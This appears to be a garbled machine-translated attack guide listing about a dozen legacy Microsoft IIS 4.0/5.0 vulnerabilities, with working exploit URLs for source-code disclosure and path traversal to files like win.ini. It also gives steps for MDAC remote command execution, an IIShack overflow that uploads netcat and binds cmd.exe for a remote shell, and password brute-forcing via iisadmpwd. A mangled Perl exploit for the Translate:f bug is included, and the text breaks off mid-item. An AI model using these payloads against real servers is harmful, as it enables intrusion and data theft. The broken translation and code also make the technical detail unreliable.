IIS Vulnerability Collection

1. The method described here is mainly through port 80, which has great threatening because it is always open as the network server 80 port. If you want to be convenient, download some WWW, CGI scanner to assist check. And know what service program running in the target machine, you can use the following command: Telnet 80 Get Head / HTTP / 1.0 can return some domain name and web service program version, if some servers run the web service 8080, 81, 8000, 8001, you have the corresponding port of Telnet. 2. Common Vulnerabilities (1), null.htw IIS If I run Index Server, it contains a vulnerability related to null.htw, that is, the file does not exist on this .htw on the server. This vulnerability will result in the source code of the ASP script, and Global.asa contains sensitive information such as user accounts. If an attacker provides a special URL request to IIS, you can jump out of the virtual directory limit, perform access to the logical partition and root directory. This hit-highlighting function does not fully prevent requests from various types of files in Index Server, so that the attacker accesses any files on the server. Null.htw features You can get three variables from user input: CiWebhitsFile Cirestriction CiHilittype you can pass variables to get the source code such as default.asp: http: // www. Target .com / null.htw? CiWebhitsFile = / Default.asp% 20 &% 20 CIRESTRICTION = None% 20 &% 20 & CiHilittype = FULL in which a legal .htw file is because the virtual file has been stored in memory. (2) MDAC-Executive local command vulnerability This vulnerability has been more early, but in a global scale, there may be a lot of IIS web servers exist, just like today, there are still many people like Windows 3.2. IIS's MDAC component exists a vulnerability that can lead to an attacker to remotely perform commands of the target system. The main core problem is to exist in RDSDataFactory. By default, it allows the remote command to be sent to the IIS server, which is running as a device user, which is the System user by default. We can test whether this vulnerability exists by the following measures: c: /> nc -nw -w 2 80 get /msadc/msadcs.dll http If you get the following information: Application / X_varg is very likely There is no patch, you can use the two programs of the Rain Forest Puppy website (www.wiretrip.net/rfp )==mdac.pl and msadc2.pl. (3) ASP Dot bug has been relatively early. It is the defect discovered in 1997 in 1997. This vulnerability is also leaking the ASP source code to an attacker, usually there is this vulnerability on IIS3.0, in the request URL At the end of the addition, one or more points causes the disclosure of the ASP source code.

Http: // www. target machine .com / sample.asp. (4), IDC & .ida bugs This vulnerability is actually similar to the ASP DOT vulnerability, which can display its web directory information on IIS4.0, very surprising This type of vulnerability is also found on IIS5.0. By adding? IDC? Or? IDA? Suffix to the URL can cause IIS attempts to run .idc through the database connection .dll, if this .IDC does not exist, it returns Some information gives the client. Http: // www. target .com / annhes.idc or anything.idq (5), . htr bug This vulnerability is discovered by nsfocus, and the URL request to append .htr for some ASA and ASP will lead to files. Source code: http: // www. Target .com / global.asa .htr (6), NT Site Server Adsamples vulnerability By request Site.csc, it is generally saved in /adsamples/config/site.csc, attack Personnel may get some information such as DSN, UID, and PASS in the database, such as http: // www. Target .com / adsamples / config / site.csc (7), Iis Hack Some people discovered an IIS4.0 Buffer overflow vulnerability, allows the user to upload the program, such as uploading the NETCAT to the target server, and binds cmd.exe to the 80 port. This buffer is mainly present in .htr, .idc, and .stm file, this buffer requests for the URL requests for these files do not have a full boundary check for the name, resulting in running an attacker to insert some back door programs to download and execute the program in the system. To detect such a site you need two files Iishack.exe, ncx.exe, you can go to the site www.technotronic.com to download, and you still need a Web server, or a virtual server. You now run a web service on your own web server and put ncx.exe in your own directory, then use Iishack.exe to check the target machine: C: /> Iishack.exe 80 /ncx.exe then you use Netcat to connect the server you want to detect: C: /> NC 80 If the overflow point is correct, you can see the command line prompt of the target machine, and Remote management permissions. Codebrws.asp & showcode.asp. Codebrws.asp and showcode.asp are included in IIS4.0, but is not installed by default, this viewer is installed in the case where the administrator allows the sample file as a contact. However, this viewer does not limit the files accessed, and the remote attacker can use this vulnerability to view any file content on the target machine, but pay attention to the following points: 1. Codebrws.asp and showcode.asp are not installed by default. 2. The vulnerability only allows you to view file content. 3. This vulnerability cannot bypass the limit of the ACL control list of Windows NT. 4. Only the files under the same partition can be viewed (so install IIS directories and Winnt partitions is a good solution, which is likely to prevent the latest IIS5.0 Unicode vulnerability). 5, attackers need to know the request name.

For example, you find this file and meet the above requirements, you can request the following command: http: // www. Target .com / iisamples / exAasp? Source = / iisamples / ExAir / HowitWorks / Codebrws .asp you can check the source code of Codebrws.asp. You can also use showcode.asp to view files: http: // www. Target .com / msadc / samples / selector / showcode.asp? Source = / msadc /../../../../. ./winnt/win.ini Of course, you can also view some FTP information to get other machines that are often used frequently, perhaps the security of other machines than the web server, such as: http://xxx.xxx.xxx .XX / MSADC / Sample.asp? Source = / msadc / Samples / Winnt / System32 / Logfiles / MSFTPSVC1 / EX00517.LOG (8), WebHits.dll & .htw This hit-highligting feature is an entry provided by INDEX Server to HIGHLIGHTED (highlight) its original search on the document, the name of this document passes the .htw file through the variable ciWebhitsFile, WebHits.dll It is an ISAPI application to handle the request, open the file and return the result. When the user controls the CiWebhitsFile parameter, they can request any file, the result is that the ASP source and other script file content can be viewed. To know if you have this vulnerability, you can request the following entry: http: // www. Target machine .com / nochfile.htw If you get the following information from the server: Format of the query_string is invalid This means you have this vulnerability . This problem is mainly webhits.dll's map of the .htw file, so you can avoid this vulnerability as long as you cancel this mapping, you can search for .htw files in the system you think there is a vulnerability, usually find the following procedures: / iissamples / issamples / oop / qfullhit.htw /iissamples/issamples/oop/qsumrhit.htw /isssamples/exair/search/qfullhit.htw /isssamples/exair/search/qsumrhit.htw /isshelp/iss/misc/iirturnh.htw ( This generally loopback can be used) an attacker can use the following method to access the contents of the file in the system: http: // www. Target .com / iissample / ipsamples / oop / qfullhit.htw? CiWebhitsFile = / .. / .. /winnt/win.ini&cirestriction=none&cihilittype=full will be in this vulnerability system.

(9), ASP Alternate Data Streams (:: $ DATA) $ DATA This vulnerability is published in the mid-1998, $ data is the Main Data Stream property stored in the file in the NTFS file system, by establishing a special format URLs, you might use IIS to access this Data Stream in your browser, which also displays the data code contained in the file code and any files. This vulnerability requires the following limitations, one is to display the file to be saved in the NTFS file partition (Fortunately, for a wide range of servers set up the NTFS format, the second is that the file needs to be set to globally readable. And unauthorized users need to know the name of the file name, IIS 1.0, 2.0, 3.0, and 4.0 in WIN NT exist this problem. Microsoft provides an IIS3.0 and 4.0 version patch, to view some .asp files, you can request the following URL: http: // www. Target machine .com / default.asp :: $ data you get Source code. You have to understand the data flow problem in the NTFS file system, you may see this article: http://focus.silversand.net/newsite/skill/NTFS.TXT (10), ism.dll buffer truncated vulnerability this vulnerability Save in IIS4.0 and 5.0, allowing attackers to view any file content and source code. By adding nearly 230 or?% 20? (These represent spaces) after the file name and add? Htr® special request to IIS, will IIS think that the client request is? .Htr? File, and .htr? The suffix of the file is mapped to the ISM.dll ISAPI application so that IIS transfers this .htr request to this DLL file, then ISM.DLL program opens and execute the passed file, but before the ISM.DLL truncation information, buffer The zone sends a disconnected .htr and returns some time to return some file content you want to open. But pay attention, this attack can only be effectively executed unless the web service is stopped and restarted. If a .htr request has been sent to the machine, then this attack will fail. It can only work in memory for the first time ISM.DLL for the first time. http://www. Target machine .com / global.asa% 20% 20 (... <= 230) Global.asa.htr (11), some violent cracking threats. HTR program IIS4.0 contains one Serious vulnerability is to allow remote users to attack the user account on the web server, that is, your web server converts the address through NAT, and can also be attacked. Each IIS4.0 is installed to create a virtual directory / iisadmpwd, this directory contains multiple .htr files, anonymous users allow access to these files, these files just have not specified only in loopback addr (127.0.0.1), requested these files Jump out of the dialog, let you modify the user's account and password through the web. This directory physical map is under the directory: C: / Winnt / System32 / inetsrv / isadmpwd achg.htr aexp.htr aexp2.htr aexp2b.htr aexp3.htr aexp4.htr aexp4b.htr Anot.htr ANOT3.HTR This, attack People can guess your password through violence. If you don't use this service, remove this directory immediately.

(12), translate: f bug This vulnerability was posted on August 15, 2000 (www.securityfocus.com/bid/1578), its problem is to exist in WebDAV in Office 2000 and FrontPage 2000Server Extensions, when someone requests an ASP / ASA's other scripts are added to the HTTP GET, and the file code is displayed after the request file, and the file code is displayed. Of course, there is no Win2K SP1 patch to premise. This is the W2K vulnerability, but since the FP2000 is also installed on IIS4.0, this vulnerability is also available on IIS4.0, you can use the following scripts to use this vulnerability: ########### ################## @ @ m ($ port, $ sock, $ server); # $ size = 0; # ###### ################# # $ server = $ argv [0]; $ s = $ server; $ port = 80; $ cm = $ argv [ 1]; & connect; Sub connect {if ($ # Argv <1) {howto (); exit;} $ VER = Get / $ cm% 5c http / 1.0 Host: $ server accept: * / * Translate: f / N / N; $ PROTO); $ Iaddr = inet_aton ($ server) || Die Error: $ !; $ paddr = sockaddr_in ($ port, $ ipdr) || DIE Error: $ !; $ protO = getProtobyname ('tcp') || Die Error: $ !; socket (SOCK, PF_INET, SOCK_STREAM, $ Proto) || Die Error: $! etc (SOCK, $ PADDR) || Die Error: $! Send (Sock, $ Ver, 0) || Die Can't to Send Packet: $ !; Open (out,> $ server.txt); Print Dumping $ cm to $ server.txt / n; while () {Print Out ;} Sub HOWTO {Print Type As Follows: Trans.pl Www. target .com codeoview.asp / n / n;} close; $ n = 0; $ TYPE = 2; Close (6);} You can use the following method to get the source code: trasn.pl www. Target machine .com default.asp (13), unicode solution in IIS Analyzing the Error Vulnerability NSFOCUS Security Panel found that Microsoft IIS 4.0 and IIS 5.0 exist in a security vulnerability in the implementation of Unicode character decoding, causing users to remotely perform any commands through IIS. When IIS opens a file, if the file name contains Unicode characters, it will decode it if the user provides some special coding, which will cause an IIS error to open or perform files other than some web root directory. You can use this vulnerability with the following method: (1) If the system contains an executable directory, any system command may be performed.